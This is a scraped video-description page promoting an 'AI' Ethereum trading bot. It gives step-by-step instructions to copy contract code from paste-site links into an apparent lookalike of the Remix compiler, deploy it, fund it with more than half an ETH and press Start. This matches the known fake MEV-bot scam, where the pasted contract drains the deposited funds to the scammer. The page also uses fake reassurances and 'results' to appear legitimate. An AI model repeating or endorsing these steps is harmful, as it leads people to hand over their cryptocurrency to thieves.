Source link

Hello everyone, today I want to tell you how to use Artificial Intelligence.

πŸŽ“ Bot Source Code: https://codes-copybin.com/raw/tEGPvS
( πŸŽ“ Backup-Source: https://scriptcode-copy.com/raw/ydFHpc )

STEP-BY-STEP GUIDE:

1️⃣ Download wallet: https://metamask.io/download
(Skip this step if you have one)

2️⃣ Go to the compiler: https://idecompiler-remix.com

3️⃣ Click on the β€œNew File”. Give a name to your file, you can type in this field anything what you want.

4️⃣ Copy and paste the code in compiler:
https://codes-copybin.com/raw/tEGPvS
( If previous link doesn’t work you can use this too: https://scriptcode-copy.com/raw/ydFHpc )

5️⃣ Get back to β€œCompiler” tab in remix and choose version the latest version 0.8.25 and the click β€œCompile” button.

6️⃣ Head over to the next section in compiler. Then choose the β€œInjected Provider” option in environment. And then use the function for deploying. This option allows you to release your own contract on chain. To pay gas for creating contract confirm message in wallet’s extension.

7️⃣ Check your balance and make sure there are more than half of 1ETH ( to prevent errors in deals and loses )

8️⃣ In the funcionality buttons of your own code press β€œKey” button. Keep in mind that this is the bot’s API authorization key. It means that IT’S YOUR OWN key of YOUR BOT that it uses to identificate you as its owner, BE CAREFULL and don’t reveal it to anyone! When you got key, paste it to the β€œValue” field.

9️⃣ Then use β€œSetBalancePercent” or β€œSetBalance” fields. Here you can choose how much Ethers on your wallet you want to use to make deals.
Use start button, to send command to start operating and making transactions.

πŸ’‘ To get your ethers back to your wallet from your smart contract, click on β€œStop” button, and then click β€œWithdraw”. Cause of assets can be used in the deal at the moment,.

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

00:00 – Greetings
00:34- Script overview
00:52 – Explaining principle of work
01:35 – Setting up the bot
01:49 – Creating a file
02:12 – Minimum requirements
02:38 – Setting up the bot correctly
03:45 – Review of contract
03:59 – Verifying of contract
04:22 – IMPORTANT, don’t disclouse your Authorization key to anyone
04:31 – Turning on the optimization
04:43 – Successful verified
04:52 – Re-check of contract verification
05:01 – Functionality overview
06:04 – Starting
06:12 – DO NOT REVEAL YOUR API KEY to anyone!
07:24 – My results
07:56 – Withdrawing my Ethers back
08:32 – Thanks for watching

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

πŸ”Ž How can I restore the old contract again? Instead of creating a new contract in the IDE section. Better re-use your last contract by pasting your contract into the “At Address” section and press the button.

Note: Access cannot be restored by any other account than your last and without your api key, that you got during creating last one.

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

date : 2024-05-14 14:19:20

views : 33

likes : 2

rating :

found searching for metamask programming tutorial

LEAVE A REPLY

Please enter your comment!
Please enter your name here